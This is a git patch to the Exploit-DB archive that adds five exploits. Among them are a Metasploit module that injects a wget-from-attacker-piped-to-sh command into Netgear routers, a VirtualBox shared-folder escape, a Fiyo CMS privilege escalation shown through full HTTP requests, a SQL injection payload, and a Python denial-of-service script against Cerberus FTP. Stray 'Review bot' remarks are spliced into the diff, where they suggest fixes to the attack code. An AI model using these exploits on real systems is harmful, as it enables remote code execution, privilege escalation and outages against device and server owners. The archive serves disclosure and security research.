From 8359f0a6a28fa175bd3a8aafe1d44ea374bb1b6c Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 14 Mar 2017 05:01:18 +0000
Subject: [PATCH] DB: 2017-03-14
5 new exploits
Cerberus FTP Server 8.0.10.1 - Denial of Service
VirtualBox - Cooperating VMs can Escape from Shared Folder
Netgear R7000 and R6400 - cgi-bin Command Injection (Metasploit)
Car Workshop System - SQL Injection
Fiyo CMS 2.0.6.1 - Privilege Escalation
---
 files.csv | 5 ++
 platforms/cgi/remote/41598.rb | 104 ++++++++++++++++++++++++++++
 platforms/lin_x86/shellcode/41403.c | 2 +-
 platforms/linux/local/41597.txt | 55 +++++++++++++++
 platforms/php/webapps/41594.txt | 76 ++++++++++++++++++++
 platforms/php/webapps/41595.txt | 26 +++++++
 platforms/win_x86/shellcode/41467.c | 2 +-
 platforms/windows/dos/41596.py | 46 ++++++++++++
 8 files changed, 314 insertions(+), 2 deletions(-)
 create mode 100755 platforms/cgi/remote/41598.rb
 create mode 100755 platforms/linux/local/41597.txt
 create mode 100755 platforms/php/webapps/41594.txt
 create mode 100755 platforms/php/webapps/41595.txt
 create mode 100755 platforms/windows/dos/41596.py
diff --git a/files.csv b/files.csv
index 6c7a98050..910da06d3 100644
--- a/files.csv
+++ b/files.csv
@@ -5389,6 +5389,7 @@ id,file,description,date,author,platform,type,port
 41537,platforms/hardware/dos/41537.py,"Conext ComBox 865-1058 - Denial of Service",2017-03-02,"Mark Liapustin and Arik Kublanov",hardware,dos,0
 41547,platforms/windows/dos/41547.py,"Evostream Media Server 1.7.1 (x64) - Denial of Service",2017-03-07,"Peter Baris",windows,dos,0
 41565,platforms/hardware/dos/41565.py,"Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service",2017-03-09,"Quentin Olagne",hardware,dos,0
+41596,platforms/windows/dos/41596.py,"Cerberus FTP Server 8.0.10.1 - Denial of Service",2017-03-13,"Peter Baris",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8828,6 +8829,7 @@ id,file,description,date,author,platform,type,port
 41476,platforms/windows/local/41476.txt,"Cisco AnyConnect Secure Mobility Client 4.3.04027 - Privilege Escalation",2017-02-28,Pcchillin,windows,local,0
 41538,platforms/windows/local/41538.cs,"CyberGhost 6.0.4.2205 - Privilege Escalation",2017-03-06,"Kacper Szurek",windows,local,0
 41542,platforms/windows/local/41542.c,"USBPcap - Privilege Escalation",2017-03-07,"Parvez Anwar",windows,local,0
+41597,platforms/linux/local/41597.txt,"VirtualBox - Cooperating VMs can Escape from Shared Folder",2017-03-13,"Google Security Research",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15314,6 +15316,7 @@ id,file,description,date,author,platform,type,port
 41511,platforms/windows/remote/41511.py,"FTPShell Client 6.53 - Buffer Overflow",2017-03-04,"Peter Baris",windows,remote,0
 41545,platforms/windows/remote/41545.py,"Azure Data Expert Ultimate 2.2.16 - Buffer Overflow",2017-03-07,"Peter Baris",windows,remote,0
 41592,platforms/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,windows,remote,0
+41598,platforms/cgi/remote/41598.rb,"Netgear R7000 and R6400 - cgi-bin Command Injection (Metasploit)",2017-03-13,Metasploit,cgi,remote,80
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37360,6 +37363,7 @@ id,file,description,date,author,platform,type,port
 41400,platforms/php/webapps/41400.txt,"Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0
 41401,platforms/ios/webapps/41401.txt,"Album Lock 4.0 iOS - Directory Traversal",2017-02-20,Vulnerability-Lab,ios,webapps,0
 41402,platforms/hardware/webapps/41402.txt,"Tenda N3 Wireless N150 Home Router - Authentication Bypass",2015-09-03,"Mandeep Jadon",hardware,webapps,0
+41595,platforms/php/webapps/41595.txt,"Car Workshop System - SQL Injection",2017-03-13,"Ihsan Sencan",php,webapps,0
 41404,platforms/hardware/webapps/41404.html,"DIGISOL DG-HR1400 Wireless Router - Cross-Site Request Forgery",2017-02-21,Indrajith.A.N,hardware,webapps,0
 41405,platforms/php/webapps/41405.txt,"Joomla! Component J-HotelPortal 6.0.2 - 'review_id' Parameter SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
 41406,platforms/php/webapps/41406.txt,"Joomla! Component J-CruiseReservation Standard 3.0 - 'city' Parameter SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0
@@ -37507,3 +37511,4 @@ id,file,description,date,author,platform,type,port
 41589,platforms/php/webapps/41589.txt,"Yacht Listing Script 2.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
 41590,platforms/php/webapps/41590.txt,"Yellow Pages Script 3.2 - 'category_id' Parameter SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
 41591,platforms/php/webapps/41591.txt,"PHP Forum Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0
+41594,platforms/php/webapps/41594.txt,"Fiyo CMS 2.0.6.1 - Privilege Escalation",2017-03-11,rungga_reksya,php,webapps,0
diff --git a/platforms/cgi/remote/41598.rb b/platforms/cgi/remote/41598.rb
new file mode 100755
index 000000000..ad9737db9
--- /dev/null
+++ b/platforms/cgi/remote/41598.rb
@@ -0,0 +1,104 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => "Netgear R7000 and R6400 cgi-bin Command Injection",
+ 'Description' => %q{
+ This module exploits an arbitrary command injection vulnerability in
+ Netgear R7000 and R6400 router firmware version 1.0.7.2_1.1.93 and possibly earlier.
+ },
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'linux',
+ 'Author' => ['thecarterb', 'Acew0rm'],
+ 'DefaultTarget' => 0,
+ 'Privileged' => true,
+ 'Arch' => ARCH_ARMLE,
+ 'Targets' => [
+ [ 'Automatic Target', { } ]
+ ],
+ 'References' =>
+ [
+ [ 'EDB', '40889'],
+ [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305'],
+ [ 'URL', 'https://www.kb.cert.org/vuls/id/582384'],
+ [ 'URL', 'http://kb.netgear.com/000036386/CVE-2016-582384'],
+ [ 'CVE', '2016-6277']
+ ],
+ 'DisclosureDate' => 'Dec 06 2016',
+ 'DefaultOptions' =>
+ {
+ 'PAYLOAD' => 'linux/armle/mettle_reverse_tcp'
+ }
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(80)
+ ], self.class)
+
+ deregister_options('URIPATH')
+ end
+
+ def scrape(text, start_trig, end_trig)
+ text[/#{start_trig}(.*?)#{end_trig}/m, 1]
+ end
+
+ # Requests the login page which discloses the hardware, if it's an R7000 or R6400, return Detected
+ def check
+ res = send_request_cgi({'uri'=>'/'})
+ if res.nil?
+ fail_with(Failure::Unreachable, 'Connection timed out.')
+ end
+ # Checks for the `WWW-Authenticate` header in the response
+ if res.headers["WWW-Authenticate"]
+ data = res.to_s
+ marker_one = "Basic realm=\"NETGEAR "
+ marker_two = "\""
+ model = scrape(data, marker_one, marker_two)
+ vprint_status("Router is a NETGEAR router (#{model})")
+ if model == 'R7000' || model == 'R6400'
+ print_good("Router may be vulnerable (NETGEAR #{model})")
+ return CheckCode::Detected
+ else
+ return CheckCode::Safe
+ end
+ else
+ print_error('Router is not a NETGEAR router')
+ return CheckCode::Safe
+ end
+ end
+
+ def exploit
+ return if check == CheckCode::Safe
+
+ @cmdstager = generate_cmdstager(flavor: :wget, 'Path' => '/').join(';')
+
+ send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => "/cgi-bin/;wget$IFS-O-$IFS'#{srvhost_addr}:#{srvport}'|sh"
+ )
+ end
+
+ # Return CmdStager on first request, payload on second
+ def on_request_uri(cli, request)
+ if @cmdstager
+ send_response(cli, @cmdstager)
+ @cmdstager = nil
+ else
+ super
+ end
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/lin_x86/shellcode/41403.c b/platforms/lin_x86/shellcode/41403.c
index 032587d2a..6690a4645 100755
--- a/platforms/lin_x86/shellcode/41403.c
+++ b/platforms/lin_x86/shellcode/41403.c
@@ -1,6 +1,6 @@
 # Title: x86 SELinux change between permissive and enforcing modes shellcode
 # Date: 20-02-2017
-# Author: Krzysztof Przybylski
+# Author: lu0xheap
 # Platform: Lin_x86
 # Tested on: CentOS 6.8 (i686)
 # Shellcode Size: 45 bytes
diff --git a/platforms/linux/local/41597.txt b/platforms/linux/local/41597.txt
new file mode 100755
index 000000000..ad51461b7
--- /dev/null
+++ b/platforms/linux/local/41597.txt
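Review bot: The comment above `check` promises Detected for an R7000/R6400, but nothing in the method compares the firmware version named in the module description (1.0.7.2_1.1.93), so the fingerprint is model-only and an updated router returns the same code. The comment should say so, e.g. `# Fingerprints the model from the Basic-auth realm only; the firmware version is never verified, so Detected (not Vulnerable) is the strongest result this check can return`. Note also that `scrape` returns nil when the realm has no closing quote, which the string comparison silently maps to Safe; printing the raw header at `vprint_status` level would make that case diagnosable. `exploit` inherits the same model-only assumption because it bails only on Safe.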
@@ -0,0 +1,55 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1037
+
+There is a security issue in the shared folder implementation that
+permits cooperating guests with write access to the same shared folder to
+gain access to the whole filesystem of the host, at least on Linux hosts.
+
+The issue is that, when the host checks whether a given path escapes the root
+directory of the shared folder in vbsfPathCheckRootEscape(), the function
+assumes that the directory hierarchy is static: E.g. the path
+"base/a/b/c/../../.." is assumed to be equivalent to "base/a/b/../..",
+"base/a/.." and "base". However, at least on Linux, renames can occur at the
+same time as path traversal.
+
+This means that, if VM A attempts to open "base/a/b/c/../../../foo" while
+VM B is moving "base/a/b/c" to "base/c_", VM A might actually end up opening
+"base/../../foo" instead of "base/foo".
+
+To demonstrate the issue, on a Linux host with Virtualbox 5.1.10:
+
+ - Place a file called "real_root_marker" in the root directory of the Linux
+ host, containing some secret text. The VMs will attempt to obtain
+ the contents of this file.
+
+ root@host:/# echo "this is secret text in the host fs" > /real_root_marker
+
+ - Create two Linux VMs with a shared writable folder.
+ - In the VMs, install the guest extensions, with the attached patch
+ vboxsf_new.patch applied.
+ - In the VMs, ensure that the new vboxsf kernel module is loaded and that
+ the shared folder is mounted.
+ - In VM A, compile and run the attached file openspam.c:
+
+ root@vmA:/media/sf_vboxshared# gcc -o openspam openspam.c -std=gnu99
+ root@vmA:/media/sf_vboxshared# ./openspam
+ entering directory...
+ entered directory and prepared folders, racing...
+
+ - In VM B, compile and run the attached file renamespam.c:
+
+ root@vmB:/media/sf_vboxshared# gcc -o renamespam renamespam.c -std=gnu99
+ root@vmB:/media/sf_vboxshared# ./renamespam
+
+Now, in VM A, you should see the contents of the host's /real_root_marker
+within seconds:
+
+ SUCCESS
+ this is secret text in the host fs
+ EOF
+
+Note: The exploit assumes that the shared folder isn't more than nine levels
+away from the filesystem root.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41597.zip
diff --git a/platforms/php/webapps/41594.txt b/platforms/php/webapps/41594.txt
new file mode 100755
index 000000000..feceef4e4
--- /dev/null
+++ b/platforms/php/webapps/41594.txt
@@ -0,0 +1,76 @@
+# Exploit Title: Fiyo CMS 2.0.6.1 allows remote authenticated users to gain privileges via a modified level parameter
+# Google Dork: no
+# Date: 11-03-2017
+# Exploit Author: @rungga_reksya, @dvnrcy
+# Vendor Homepage: http://www.fiyo.org
+# Software Link: https://sourceforge.net/projects/fiyo-cms
+# Version: 2.0.6.1
+# Tested on: Windows Server 2012 Datacenter Evaluation
+# CVE : CVE-2017-6823
+
+I. Background:
+Fiyo CMS di kembangkan dan dibuat pertama kali oleh mantan seorang pelajar SMK yang pada saat itu bersekolah di SMK 10 Semarang jurusan RPL. Pada zaman itu namanya bukan Fiyo CMS melainkan Sirion yang merupakan akronim dari Site Administration.
+
+II. Description:
+Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1
+
+III. Exploit:
+Fiyo CMS have five user group (super administrator, administrator, editor, publisher, member) and only three group can access backend page of admin (super administrator, administrator and editor).
+
+If we login as super administrator and access edit profile menu, check source code (ctrl+u) from your browser and we get level privilege:
+super administrator = 1
+administrator = 2
+editor = 3
+publisher = 4
+member = 5
+
+Ok, prepare your tool like burpsuite to intercept traffic. in this case I login as editor and I want manipulation of editor group (level=3) to be super administrator group (level=1).
The first you access on menu “Edit Profile” and click “Simpan (Save)”, and then change like this on your burpsuite intercept menu:
+
+Original:
+
+POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1
+Host: 192.168.1.2
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.1.2/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3
+Cookie: c40cded1c770e0ead20a6bcbf9a26edf=hplreme8us3iem3jg36km36ob5; PHPSESSID=dcj4n83jd2tdrjs32fo6gm9eq7
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 134
+
+edit=Next&id=3&z=editor&user=editor&z=editor&x=&password=editor&kpassword=editor&email=editor%40localhost.com&level=3&name=editor&bio=
+
+
+Manipulation (Change Level=3 to be Level=1):
+
+POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1
+Host: 192.168.1.2
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.1.2/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3
+Cookie: c40cded1c770e0ead20a6bcbf9a26edf=hplreme8us3iem3jg36km36ob5; PHPSESSID=dcj4n83jd2tdrjs32fo6gm9eq7
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 134
+
+edit=Next&id=3&z=editor&user=editor&z=editor&x=&password=editor&kpassword=editor&email=editor%40localhost.com&level=1&name=editor&bio=
+
+Yeaaah, now editor become super administrator privilege ^_^ and The level of administrator can be super administrator too.
+
+
+IV. Thanks to:
+- Alloh SWT
+- MyBoboboy
+- MII CAS
+- Komunitas IT Auditor & IT Security Kaskus
+
+
+Refer:
+https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)
+
+
+
diff --git a/platforms/php/webapps/41595.txt b/platforms/php/webapps/41595.txt
new file mode 100755
index 000000000..bb847d242
--- /dev/null
+++ b/platforms/php/webapps/41595.txt
@@ -0,0 +1,26 @@
+# # # # #
+# Exploit Title: Car Workshop System - SQL Injection
+# Google Dork: N/A
+# Date: 13.03.2017
+# Vendor Homepage: http://prosoft-apps.com/
+# Software: https://codecanyon.net/item/car-workshop-system/19562074
+# Demo: http://workshop.prosoft-apps.com/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail: ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/services/print_service_invoice?job_id=[SQL]
+# 6'+/*!50000union*/+select+1,2,3,/*!50000concat*/(database(),0x7e,version()),5,6,7,8,9,10,11,12--+-
+#
+# In addition.
+# Technician User, There are security vulnerabilities.
+# purchase_order/deletePO?id=
+# technician_services/tech_opened_services_view?job_id=
+# technician_services/tech_drew_out_inventory_services_view?job_id=
+# technician_services/tech_completed_services_view?job_id=
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/win_x86/shellcode/41467.c b/platforms/win_x86/shellcode/41467.c
index 40359279d..9f170e84c 100755
--- a/platforms/win_x86/shellcode/41467.c
+++ b/platforms/win_x86/shellcode/41467.c
@@ -1,6 +1,6 @@
 # Title: Windows x86 - Executable directory search Shellcode (130 bytes)
 # Date: 26-02-2017
-# Author: Krzysztof Przybylski
+# Author: lu0xheap
 # Platform: Win_x86
 # Tested on: WinXP SP1
 # Shellcode Size: 130 bytes
diff --git a/platforms/windows/dos/41596.py b/platforms/windows/dos/41596.py
new file mode 100755
index 000000000..76b152cf1
--- /dev/null
+++ b/platforms/windows/dos/41596.py
@@ -0,0 +1,46 @@
+# Exploit Title: Cerberus FTP server – Denial of Service
+# Date: 2017-03-13
+# Exploit Author: Peter Baris
+# Vendor Homepage: https://www.cerberusftp.com/
+# Software Link: [download link if available]
+# Version: 8.0.10.1
+# Tested on: Windows Server 2008 R2 Standard x64, Windows 7 Pro SP1 x64
+# CVE : CVE-2017-6367
+
+# 2017-02-27: Vulnerability discovered, Contact to Cerberus Support
+# 2017-02-27: Reply received, PoC exploit code sent
+# 2017-02-27: Problematic module identified by the vendor, gSOAP
+# 2017-03-02: New version 8.0.10.2 released - https://www.cerberusftp.com/products/releasenotes/
+# 2017-03-02: gSOAP module update released by the vendor and advisory placed https://www.genivia.com/advisory.html
+# 2017-03-02: grace period until 13th March
+# 2017-03-13: Publishing
+
+import socket
+import sys
+
+try:
+ host = sys.argv[1]
+ port = 10001
+except IndexError:
+ print "[+] Usage %s " % sys.argv[0]
+ sys.exit()
+
+
+exploit = "A"*5004
+
+buffer = "GET /index.html HTTP/1.1\r\n"
+buffer+= "Host: "+exploit+host+":"+str(port)+"\r\n"
+buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
+buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\
+r\n"
+buffer+="Accept-Language: en-US,en;q=0.5\r\n"
+buffer+="Accept-Encoding: gzip, deflate\r\n"
+buffer+="Referer: "+host+":"+str(port)+"\r\n"
+buffer+="Connection: keep-alive\r\n"
+buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
+buffer+="Content-Length: 5900\r\n\r\n"
+
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect((host,port))
+s.send(buffer)
+s.close()
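Review bot: The usage message printed when the argument is missing, `print "[+] Usage %s " % sys.argv[0]`, never names the argument it is asking for; it should read `print "[+] Usage: %s <host>" % sys.argv[0]`. In the same `try`, `port = 10001` cannot raise IndexError and belongs outside the block, and the `connect=` binding is dead because `socket.connect` returns None. The backslash at the end of the Accept header literal (`...q=0.8\` continued by `r\n"`) is a line continuation inside the string, so the bytes sent differ from the `\r\n` the surrounding headers use; keeping that header on one line removes the ambiguity. The file is Python 2 (`print` statement), which is worth stating in the header next to "Tested on" since nothing else in the file signals it.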